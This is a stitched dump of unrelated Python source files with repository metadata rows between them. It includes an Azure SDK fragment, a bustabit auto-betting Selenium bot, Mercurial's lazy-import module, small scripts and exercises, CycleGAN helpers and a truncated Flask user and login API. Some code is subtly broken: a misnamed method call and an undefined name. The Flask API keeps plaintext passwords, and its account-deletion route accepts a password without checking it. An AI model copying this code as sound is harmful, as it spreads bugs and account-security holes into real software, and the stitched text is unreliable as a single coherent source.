blob_services_name = "default"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_service_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'BlobServicesName': self._serialize.url("blob_services_name", blob_services_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'BlobServiceProperties')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('BlobServiceProperties', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_service_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices/{BlobServicesName}'} # type: ignore
def get_service_properties(
self,
resource_group_name, # type: str
account_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.BlobServiceProperties"
"""Gets the properties of a storage account’s Blob service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BlobServiceProperties, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobServiceProperties"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01"
blob_services_name = "default"
accept = "application/json"
# Construct URL
url = self.get_service_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'BlobServicesName': self._serialize.url("blob_services_name", blob_services_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('BlobServiceProperties', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_service_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices/{BlobServicesName}'} # type: ignore
| [
"[email protected]"
] | |
047f00770d20b8038d7afcd98a956810a9380d97 | fa305ce263851654d122d2b2074ed08b0910c952 | /bot.py | 98fd1e289164908842495702378813acfad8959f | [] | no_license | kimelecta/bustabot | 8a413d328de07fb8a3aa696f7ddc6eeb0c6d1ce0 | c613b5b33d43270a699ae76442bc28c79882ffa1 | refs/heads/master | 2022-11-06T22:03:05.376727 | 2020-06-17T13:55:11 | 2020-06-17T13:55:11 | 272,973,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,466 | py | from http.server import HTTPServer, BaseHTTPRequestHandler
import os
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import sys
HOST = ''  # bind on all interfaces
PORT = os.environ['PORT']  # supplied by Heroku at dyno start
URL = os.environ['HEROKU_APP_URL']  # public URL of this app, used for keep-alive pings
SIMULATION = False  # when True, run the bustabit script against a simulated balance
class MyHTTPHandler(BaseHTTPRequestHandler):
    """The request handler class for our server.

    It is instantiated once per connection to the server.  Every GET answers
    with a plain-text status report (username, profit, balance, game log)
    scraped from the bustabit page through the shared selenium webdriver
    that Server attaches to the HTTPServer instance.
    """
    def do_GET(self):
        self.send_response(200, 'OK')
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        # Modify log container height to get more log
        self.server.webdriver.execute_script("document.getElementsByClassName('logListContainer')[0].style.height = '400px'") # modify the height to have more log
        log = self.server.webdriver.find_element_by_xpath("//div[@class='ReactVirtualized__Grid__innerScrollContainer']").text
        # Open profile screen
        self.server.webdriver.find_element_by_xpath("//a[@href='/account/overview']").click()
        # Wait for the information table to show
        wait = ui.WebDriverWait(self.server.webdriver, 1)
        try:
            wait.until(EC.presence_of_element_located((By.XPATH, "//table[@class='table-light table table-condensed table-hover']")))
        except:
            # Table never appeared: report failure to the HTTP client and bail.
            self.wfile.write(b'error')
            return
        # Get usefull player informations
        game_profit = self.server.webdriver.find_element_by_xpath("//table[@class='table-light table table-condensed table-hover']/tbody/tr[7]/td[2]").text
        username = self.server.webdriver.find_element_by_xpath("//div[@class='account-header']/h3").text
        balance = self.server.webdriver.find_element_by_xpath("//table[@class='table-light table table-condensed table-hover']/tbody/tr[8]/td[2]").text
        # Close profile screen
        self.server.webdriver.find_element_by_xpath("//button[@class='close']").click()
        msg = 'Username : ' + username + '\nProfit : ' + game_profit + '\nBalance : ' + balance + '\n\n' + log
        self.wfile.write(bytes(msg, 'utf-8'))
class Server:
    """Serves HTTP on the Heroku $PORT environment variable.

    It must be instantiated only once: the constructor binds the port.
    """
    _httpd = None

    def __init__(self, webdriver):
        # Bind on $PORT and expose the shared selenium webdriver to the
        # request handler via an attribute on the HTTPServer object.
        self._httpd = HTTPServer((HOST, int(PORT)), MyHTTPHandler)
        self._httpd.webdriver = webdriver

    def run(self):
        # Blocks forever, handling status requests one at a time.
        self._httpd.serve_forever()
class Bustabit:
    """The Bustabit class is the core of this project.

    It instantiates and runs the selenium webdriver used to communicate with
    the bustabit site: log in with a saved Firefox profile, inject the user's
    betting script, start it, then serve status over HTTP forever.
    """
    _error = False
    _webdriver = None
    _script = None

    def __init__(self, profile_folder, script_name):
        # Read the user's betting script once; it is typed into the page later.
        fd = open(script_name, "r")
        self._script = fd.read()
        fd.close()
        # Launch Firefox GUI in headless mode
        opt = webdriver.FirefoxOptions()
        opt.headless = True
        self._webdriver = webdriver.Firefox(firefox_profile=profile_folder, firefox_options=opt)
        return

    def _connect(self):
        """Init webdriver: open the play page and check we are logged in."""
        self._webdriver.get('https://www.bustabit.com/play')
        # Wait until we find the presence of the 'auto' button
        try:
            wait = ui.WebDriverWait(self._webdriver, 5)
            wait.until(EC.presence_of_element_located((By.XPATH, "//li[@class='' and @role='presentation']/a[@role='button' and @href='#']")))
        except:
            # The 'Auto' tab only shows for authenticated sessions, so its
            # absence most likely means the Firefox profile is not logged in.
            print('Are you sure you are logged with your profile ?')
            self._error = True
        return

    def _auto_bet(self):
        """Starting auto bet with the user script (butabit_script.js)"""
        # Get and click on 'Auto' button
        self._webdriver.find_element_by_xpath("//li[@class='' and @role='presentation']/a[@role='button' and @href='#']").click()
        # Get and click on the eye button
        self._webdriver.find_element_by_xpath("//button[@class='btn btn-xs btn-info']/i[@class='fa fa-eye']").click()
        time.sleep(1) # Wait for the popup to dislay
        # Fill the text area with the user script
        text_area = self._webdriver.find_element_by_xpath("//textarea[@class='form-control']")
        text_area.click()
        text_area.send_keys(Keys.CONTROL, 'a')
        text_area.send_keys(Keys.RETURN)
        text_area.send_keys(self._script)
        # Get and click on the 'Save Script' button
        self._webdriver.find_element_by_xpath("//button[@class='btn btn-success' and @type='submit']").click()
        time.sleep(1)
        # Get and click on the 'Down arrow' button
        self._webdriver.find_element_by_xpath("//button[@class='btn btn-xs btn-default']").click()
        if (SIMULATION):
            # Get and click on 'Simulation' checkbox
            self._webdriver.find_element_by_xpath("//div[@class='checkbox simCheckbox']/label/input[@type='checkbox']").click()
            # Get and fill the 'simulated balance'
            SIMULATED_BALANCE = 100000
            simulated_balance_textbox = self._webdriver.find_element_by_name("simulatedBalance")
            simulated_balance_textbox.clear()
            simulated_balance_textbox.send_keys(str(SIMULATED_BALANCE))
        # Get and click on the 'Run script' button
        self._webdriver.find_element_by_xpath("//button[@class='btn btn-success' and @type='submit']").click()
        return

    def _run(self):
        """Infinite loop"""
        # Trick to keep this heroku app alive
        # 60 * 1000 = 1 minute
        self._webdriver.execute_script("""setInterval(function(){
        fetch('""" + URL + """')
        }, 60 * 1000 * 10)
        """)
        s = Server(self._webdriver)
        s.run()

    def start(self):
        """Start the Bustabit bot"""
        self._connect()
        if (self._error):
            self._webdriver.quit()
            return
        self._auto_bet()
        self._run()
        return
# Saved Firefox profile (provides the logged-in bustabit session) and the
# betting script that gets injected into the page.
FIREFOX_DIR = "firefox_profile"
SCRIPT_NAME = "bustabit_script.js"

if __name__ == "__main__":
    # Validate both required inputs before launching the browser.
    if not os.path.isdir(FIREFOX_DIR):
        print(FIREFOX_DIR + ' must be a directory')
        exit(1)
    if not os.path.isfile(SCRIPT_NAME):
        print(SCRIPT_NAME + ' must be a file')
        exit(1)
    bot = Bustabit(FIREFOX_DIR, SCRIPT_NAME)
    bot.start()
    exit(0)
| [
"[email protected]"
] | |
6893b1b04629476fddf2845af7cfe5908b9cb720 | 72e11a80587342b3f278d4df18406cd4ce7531e8 | /hgdemandimport/demandimportpy3.py | e2ea27fa0f1166fc55324efb1bbdaf6c4a5029c6 | [] | no_license | EnjoyLifeFund/Debian_py36_packages | 740666f290cef73a4f634558ccf3fd4926addeda | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | refs/heads/master | 2021-08-24T02:17:24.349195 | 2017-12-06T06:18:35 | 2017-12-06T06:18:35 | 113,167,612 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,498 | py | # demandimportpy3 - global demand-loading of modules for Mercurial
#
# Copyright 2017 Facebook Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Lazy loading for Python 3.6 and above.
This uses the new importlib finder/loader functionality available in Python 3.5
and up. The code reuses most of the mechanics implemented inside importlib.util,
but with a few additions:
* Allow excluding certain modules from lazy imports.
* Expose an interface that's substantially the same as demandimport for
Python 2.
This also has some limitations compared to the Python 2 implementation:
* Much of the logic is per-package, not per-module, so any packages loaded
before demandimport is enabled will not be lazily imported in the future. In
practice, we only expect builtins to be loaded before demandimport is
enabled.
"""
# This line is unnecessary, but it satisfies test-check-py3-compat.t.
from __future__ import absolute_import
import contextlib
import importlib.abc
import importlib.machinery
import importlib.util
import sys
# Module-wide switch: while True, modules load eagerly even though the lazy
# finder is installed (toggled by the deactivated() context manager).
_deactivated = False
class _lazyloaderex(importlib.util.LazyLoader):
    """This is a LazyLoader except it also follows the _deactivated global and
    the ignore list.
    """
    def exec_module(self, module):
        """Make the module load lazily."""
        # Eager load while demandimport is deactivated or for explicitly
        # ignored module names; otherwise defer to LazyLoader's lazy exec.
        if _deactivated or module.__name__ in ignore:
            self.loader.exec_module(module)
        else:
            super().exec_module(module)
# This is 3.6+ because with Python 3.5 it isn't possible to lazily load
# extensions. See the discussion in https://python.org/sf/26186 for more.
# Lazy-loading variants of the three standard file loaders.
_extensions_loader = _lazyloaderex.factory(
    importlib.machinery.ExtensionFileLoader)
_bytecode_loader = _lazyloaderex.factory(
    importlib.machinery.SourcelessFileLoader)
_source_loader = _lazyloaderex.factory(importlib.machinery.SourceFileLoader)
def _makefinder(path):
    """Build a FileFinder for *path* wired to the lazy loader variants,
    registered in the same order core Python uses."""
    loader_details = [
        (_extensions_loader, importlib.machinery.EXTENSION_SUFFIXES),
        (_source_loader, importlib.machinery.SOURCE_SUFFIXES),
        (_bytecode_loader, importlib.machinery.BYTECODE_SUFFIXES),
    ]
    return importlib.machinery.FileFinder(path, *loader_details)
# Module names that must always be imported eagerly (populated by init()).
ignore = []

def init(ignorelist):
    """Record the list of module names exempt from lazy importing."""
    global ignore
    ignore = ignorelist
def isenabled():
    # Lazy importing is "on" when our finder hook is installed and we are
    # not inside a deactivated() context.
    return _makefinder in sys.path_hooks and not _deactivated
def disable():
    """Uninstall lazy importing: strip every occurrence of our finder hook
    from sys.path_hooks (a no-op when it is not installed)."""
    while _makefinder in sys.path_hooks:
        sys.path_hooks.remove(_makefinder)
def enable():
    # Insert at the front so the lazy finder wins over the default hooks.
    sys.path_hooks.insert(0, _makefinder)
@contextlib.contextmanager
def deactivated():
    """Context manager that makes imports eager for the duration of the block."""
    # This implementation is a bit different from Python 2's. Python 3
    # maintains a per-package finder cache in sys.path_importer_cache (see
    # PEP 302). This means that we can't just call disable + enable.
    # If we do that, in situations like:
    #
    #   demandimport.enable()
    #   ...
    #   from foo.bar import mod1
    #   with demandimport.deactivated():
    #       from foo.bar import mod2
    #
    # mod2 will be imported lazily. (The converse also holds -- whatever finder
    # first gets cached will be used.)
    #
    # Instead, have a global flag the LazyLoader can use.
    global _deactivated
    demandenabled = isenabled()
    if demandenabled:
        _deactivated = True
    try:
        yield
    finally:
        # Restore the flag only if we set it ourselves.
        if demandenabled:
            _deactivated = False
| [
"[email protected]"
] | |
e719552d07f6604b77bce83362de1ffe0652ab54 | 4491c65a31063f9282a504601866f63e52fe2c75 | /tts.py | aa6a27419a7cdfd623a87739619acb6a33224752 | [] | no_license | Pranad17/text-to | 904e66259319a3f9aaf0d660768ba8fcd8d4b700 | b9ed2cb55765fe616482aee46b59375a11258877 | refs/heads/main | 2023-06-01T18:50:50.662538 | 2021-06-16T10:20:11 | 2021-06-16T10:20:11 | 377,455,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | import tkinter as tk
import pyttsx3
# Single shared text-to-speech engine used by every Widget instance.
engine = pyttsx3.init()
class Widget():
    """Minimal Tk window: a prompt label, a text entry and a SPEAK button
    that feeds the entry's current text to the shared pyttsx3 engine.

    Constructing a Widget builds the UI and immediately enters the Tk main
    loop, so __init__ blocks until the window is closed.
    """
    def __init__(self):
        self.root = tk.Tk()
        self.root.title("TTS")
        self.root.resizable(0,0)
        self.root.configure(background="cyan")
        self.label = tk.Label(text="What you want me to speak?",bg="cyan",fg="black",font="Arial 35 bold")
        self.label.pack()
        self.entry = tk.Entry(font="Arial 25",width=30)
        self.entry.pack()
        self.button = tk.Button(text="SPEAK",bg="royalblue",fg="brown",font="Arial 30 bold",command=self.clicked)
        self.button.pack()
        self.root.mainloop()  # blocks here until the window closes

    def clicked(self):
        # Button callback: speak whatever is currently typed in the entry.
        text = self.entry.get()
        self.speak(text)

    def speak(self,text):
        # Queue the text and block while the engine reads it aloud.
        engine.say(text)
        engine.runAndWait()
if __name__ == "__main__":
    # Constructing the widget builds the UI and runs the Tk main loop.
    temp = Widget()
"[email protected]"
] | |
d070ea5b57e7c9f251743e491b019532adcef562 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_indispositions.py | fabc644b17f9f752e045cebb4233bf3276caa5da | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py |
#calss header
class _INDISPOSITIONS():
def __init__(self,):
self.name = "INDISPOSITIONS"
self.definitions = indisposition
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['indisposition']
| [
"[email protected]"
] | |
ea9dec07d951070f1a5289ec38c7b9b3c3248485 | de8b2b0de2ba522493e2c86fa055df8c7c40aa69 | /e008-largest-product.py | e1ab6fb66b56899bf4385b65ab78fb2590571507 | [
"Unlicense"
] | permissive | bayramcicek/mini-programs | 56edbd2013704813d6730ecaf684baf9042d21ab | 3f876e3274b7beeb5e7413ac9c5275813d9f0d2d | refs/heads/master | 2021-07-03T03:57:02.874127 | 2020-09-27T11:09:07 | 2020-09-27T11:09:07 | 138,440,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | #!/usr/bin/python3.6
# created by cicek on 12.10.2018 15:09
digits = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
d_list = list(digits)
i, res = 0, 1
product_array = []
while ((i+12) < len(d_list)):
for x in range(0, 13):
res *= int(d_list[i+x])
product_array.append(res)
res = 1
i += 1
product_array.sort()
print(product_array[-1])
| [
"[email protected]"
] | |
362e9abe387de8ee165bafdca75d22ecb015f9f1 | 40efe4cdb4d7845ce7adca4b3d48aaeb2c0f35fb | /rotate_sort.py | 8412180883b47c121dd7bd07654c069a3a569c9d | [] | no_license | viz06/python_codes | b663d360d223e549401b5c10534c9085c5def6a9 | 93b067afa4ba02fba73c9709c922983b2bf9ac09 | refs/heads/master | 2022-12-19T10:16:42.645697 | 2020-09-20T19:27:10 | 2020-09-20T19:27:10 | 295,674,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | class Solution:
count=0
def findKRotation(self,arr, n):
for i in range(n-1):
if(arr[i]>arr[i+1]):
return i+1
return 0
if __name__=='__main__':
tc=int(input())
while tc>0:
n=int(input())
a=list(map(int,input().strip().split()))
ob=Solution()
ans=ob.findKRotations(a,n)
print(ans)
tc=tc-1
| [
"[email protected]"
] | |
306b1205394bae0e6a5f9c63abcc56d5c25288b4 | 5a6ea469a1a6571281e8a23ff8fbc4c3ea205a0f | /util/visualizer.py | 283a78e9dfa482932160f889533973dfff9919bf | [] | no_license | 123456789lin/Pytorch-CycleGAN-Simplified | ee00d32d1db3c5b7daf2bfdb273dcb487ee4e8de | 364b1c36a0090c0a37e22c95eec4388dc5db90e4 | refs/heads/master | 2022-12-10T00:57:48.497532 | 2020-08-30T06:12:54 | 2020-08-30T06:12:54 | 291,289,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,896 | py | import numpy as np
import time
import os
import sys
import ntpath
from . import util
from subprocess import Popen, PIPE
if sys.version_info[0] == 2:
VisdomExceptionBase = Exception
else:
VisdomExceptionBase = ConnectionError
def save_images(result_dir, visuals, image_path, aspect_ratio=1.0):
"""Save images to the disk.
Parameters:
visuals (OrderedDict) -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
image_path (str) -- the string is used to create image paths
aspect_ratio (float) -- the aspect ratio of saved images
width (int) -- the images will be resized to width x width
"""
image_dir = os.path.join(result_dir, 'images')
short_path = ntpath.basename(image_path[0])
name = os.path.splitext(short_path)[0]
if not os.path.exists(image_dir):
os.makedirs(image_dir)
ims, txts, links = [], [], []
for label, im_data in visuals.items():
im = util.tensor2im(im_data)
image_name = '%s_%s.png' % (name, label)
save_path = os.path.join(image_dir, image_name)
util.save_image(im, save_path, aspect_ratio=aspect_ratio)
class Visualizer():
"""This class includes several functions that can display/save images and print/save logging information.
"""
def __init__(self, opt):
self.opt = opt # cache the option
self.name = opt.name
self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
def display_current_results(self,img_dir, visuals, epoch):
# save images to the disk
if not os.path.exists(img_dir):
os.makedirs(img_dir)
for label, image in visuals.items():
image_numpy = util.tensor2im(image)
img_path = os.path.join(img_dir, 'epoch%.3d_%s.png' % (epoch, label))
util.save_image(image_numpy, img_path)
# losses: same format as |losses| of plot_current_losses
def print_current_losses(self, epoch, iters, losses):
"""print current losses on console; also save the losses to the disk
Parameters:
epoch (int) -- current epoch
iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
"""
message = '(epoch: %d, iters: %d) ' % (epoch, iters)
for k, v in losses.items():
message += '%s: %.3f ' % (k, v)
print(message) # print the message
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message) # save the message
| [
"[email protected]"
] | |
65652e1063e82634e4fdc2f3a31ef4a64f108db3 | 64734dce0e290095599e31d0c80920bc58d2779b | /intro to test/test.py | b98f4767518c68a9384f688ef5ff0bcbe25311bc | [] | no_license | satyamsingh2/developers-suitcase | 33f6e9fe6b8660621aa27439c320b252db322f32 | bb0651fc6b85c2249459d383e67a68147df19e44 | refs/heads/main | 2023-07-10T14:21:12.544243 | 2021-08-06T05:08:22 | 2021-08-06T05:08:22 | 360,185,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | from demo import *
import unittest
# a unit test is required to be defined inside a class
class TestArea(unittest.TestCase):
def setUp(self):
pass
#runs before running test used as preparation method before test
def test_area_of_rect(self):
self.assertEqual(area_of_rect(5,6), 30)
#basic test method 1
def test_area_of_square(self):
self.assertEqual(area_of_square(8), 64)
#basic test method 2
def test_input_value(self):
self.assertRaises(TypeError, area_of_square, True)
def tearDown(self):
pass
# runs after all the test have been run this is used for purpose like deleting the content or closing the file ,etc.
# python -m unittest discover -> use this command is used for auto discovery for test
# it will not only search them but also attempt testing all the test file present in that directory
# python -m unittest discover -s <directory-name>
# python -m unittest -v <filename>
#the command is used run all the test in verbose mode in a file
# its not compulsory to run a unittest with verbose
| [
"[email protected]"
] | |
c46422aa62a585b2fef203ad5395901b118ea3da | d1cd97730d5ed4f7bec147d237cfe9ac9b2f6134 | /app.py | 9ef7c1d9e2022174e85c07cdc30742e823d87014 | [] | no_license | tsungic/MVP-backend | b5354c6fb13bfdfbc33ad7d85b98b195c90a1be1 | 2c371f4a10e36799c8c26cac933b55caff86ff72 | refs/heads/master | 2023-04-01T20:35:46.341005 | 2021-04-14T22:17:31 | 2021-04-14T22:17:31 | 349,769,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,489 | py | from flask import Flask, request, Response
from flask_cors import CORS
import dbcreds
import mariadb
import json
import secrets
app = Flask(__name__)
CORS(app)
@app.route("/api/users", methods=["GET","POST","PATCH","DELETE"])
def users():
if request.method =="GET":
user_id = request.args.get("userId")
conn = None
cursor = None
users_data = None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
if user_id:
cursor.execute("SELECT * FROM users where id =?", [user_id])
users_data = cursor.fetchall()
else:
cursor.execute("SELECT * FROM users")
users_data = cursor.fetchall()
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if users_data or users_data ==[]:
users_info =[]
for user in users_data:
user_dic={
"userId": user[0],
"email": user [1],
"name": user [3]
}
users_info.append(user_dic)
return Response(json.dumps(users_info, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method =="POST":
conn = None
cursor = None
user_info = request.json
name = user_info.get("name")
password = user_info.get("password")
email = user_info.get("email")
user_session_id = None
if email!=None and email !="" and name!=None and name !="" and password!=None and password !="" :
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("INSERT INTO users (email, password, name) VALUES (?,?,?)", [email, password, name])
conn.commit()
user_id = cursor.lastrowid
login_token= secrets.token_urlsafe(20)
cursor.execute("INSERT INTO user_session (user_id, loginToken) VALUES (?,?)", [user_id, login_token])
conn.commit()
user_session_id = cursor.lastrowid
except Exception as e:
print(e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user_session_id != None:
user_dic={
"userId": user_id,
"email": email,
"name": name,
"loginToken": login_token
}
return Response(json.dumps(user_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "PATCH":
user_info = request.json
conn = None
cursor = None
name = user_info.get("name")
password = user_info.get("password")
email = user_info.get("email")
login_token = user_info.get("loginToken")
user= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
if email != None and email !="" and login_token != None and login_token !="":
#get userid based on login token
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
#can update user table based on user id
cursor.execute("UPDATE users SET email = ? where id = ?", [email, user_id])
if name != None and name !="" and login_token != None and login_token !="":
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
cursor.execute("UPDATE users SET name = ? where id = ?", [name, user_id])
if password != None and password !="" and login_token != None and login_token !="":
cursor.execute("SELECT user_id FROM user_session where loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
cursor.execute("UPDATE users SET password = ? where id = ?", [password, user_id])
conn.commit()
row=cursor.rowcount
cursor.execute("SELECT * FROM users where id = ?", [user_id])
user = cursor.fetchone()
except Exception as e:
print (e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user != None:
user_dic={
"userId": user[0],
"email": user [1],
"name": user[3]
}
return Response(json.dumps(user_dic, default = str), mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
if request.method == "DELETE":
user_info = request.json
conn = None
cursor = None
password = user_info.get("password")
login_token = user_info.get("loginToken")
user= None
try:
conn = mariadb .connect(user=dbcreds.user, password=dbcreds.password, host= dbcreds.host, port= dbcreds.port, database= dbcreds.database)
cursor = conn.cursor()
cursor.execute("SELECT user_id FROM user_session WHERE loginToken = ?",[login_token])
user_id = cursor.fetchone()[0]
if password != None and password !="" and login_token != None and login_token !="":
cursor.execute("DELETE FROM users WHERE id = ?",[user_id])
conn.commit()
row=cursor.rowcount
except Exception as e:
print (e)
finally:
if(cursor !=None):
cursor.close()
if(conn != None):
conn.rollback()
conn.close()
if user == None:
return Response("Delete successful", mimetype="application/json", status=200)
else:
return Response("failure", mimetype="html/text", status=400)
@app.route("/api/login", methods=["POST", "DELETE"])
def login():
    """Create (POST) or destroy (DELETE) a login session.

    POST expects JSON {"email", "password"}; on success a row is inserted
    into user_session and the user's data plus a fresh loginToken is
    returned (200). Bad credentials or blank input -> 400.
    DELETE expects JSON {"loginToken"}; removing exactly one session row
    returns 204, anything else 404.
    """
    if request.method == "POST":
        conn = None
        cursor = None
        user_info = request.json
        password = user_info.get("password")
        email = user_info.get("email")
        login_rows = None
        user_data = None
        login_token = None
        if email != "" and email is not None and password != "" and password is not None:
            try:
                conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
                cursor = conn.cursor()
                # NOTE(review): password is compared in plain text; the schema
                # presumably stores it unhashed — consider hashing (bcrypt).
                cursor.execute("SELECT * FROM users where email =? AND password =?", [email, password])
                user_data = cursor.fetchone()
                if user_data is not None:
                    # users.id is the first column of the fetched row.
                    user_id = user_data[0]
                    login_token = secrets.token_urlsafe(20)
                    cursor.execute("INSERT INTO user_session (user_id, loginToken) VALUES (?,?)", [user_id, login_token])
                    conn.commit()
                    # rowcount of the INSERT doubles as a success flag.
                    login_rows = cursor.rowcount
            except Exception as e:
                print(e)
            finally:
                if cursor is not None:
                    cursor.close()
                if conn is not None:
                    conn.rollback()  # no-op after a successful commit
                    conn.close()
        if login_rows is not None:
            user_dic = {
                "userId": user_data[0],
                "email": user_data[1],
                "name": user_data[3],
                "loginToken": login_token
            }
            return Response(json.dumps(user_dic, default=str), mimetype="application/json", status=200)
        else:
            return Response("failure", mimetype="html/text", status=400)
    if request.method == "DELETE":
        # Bug fix: conn/cursor must be bound before the try/finally runs;
        # previously a failed connect raised UnboundLocalError in `finally`.
        conn = None
        cursor = None
        login_token = request.json.get("loginToken")
        rows = None
        if login_token is not None and login_token != "":
            try:
                conn = mariadb.connect(user=dbcreds.user, password=dbcreds.password, host=dbcreds.host, port=dbcreds.port, database=dbcreds.database)
                cursor = conn.cursor()
                cursor.execute("DELETE FROM user_session where loginToken = ?", [login_token])
                conn.commit()
                rows = cursor.rowcount
            except Exception as e:
                print(e)
            finally:
                if cursor is not None:
                    cursor.close()
                if conn is not None:
